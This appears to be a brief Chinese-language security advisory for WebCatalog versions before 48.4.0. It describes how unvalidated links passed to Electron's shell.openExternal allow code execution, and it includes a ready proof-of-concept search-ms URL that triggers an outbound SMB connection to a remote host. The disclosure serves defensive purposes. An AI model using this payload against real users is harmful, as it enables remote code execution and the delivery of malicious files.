在某些情况下,WebCatalog 48.4.0 之前的版本会在未验证 URL 是否为 http 或 https 资源的情况下调用 Electron 的 shell.openExternal 函数。此漏洞允许攻击者通过发送包含任意协议链接的消息在受害者机器上执行代码。受害者需要与链接进行交互,并且会看到打开的 URL。


该漏洞可以通过同步一个允许任意URL的页面来确认。如果同步的网站包含 search-ms://query=PsExec.exe&crumb=location://live.sysinternals.com/tools,则会创建一个外部 SMB 连接。这可用于绕过本地机器的安全保护措施,并向用户呈现通常会被阻止的恶意文件。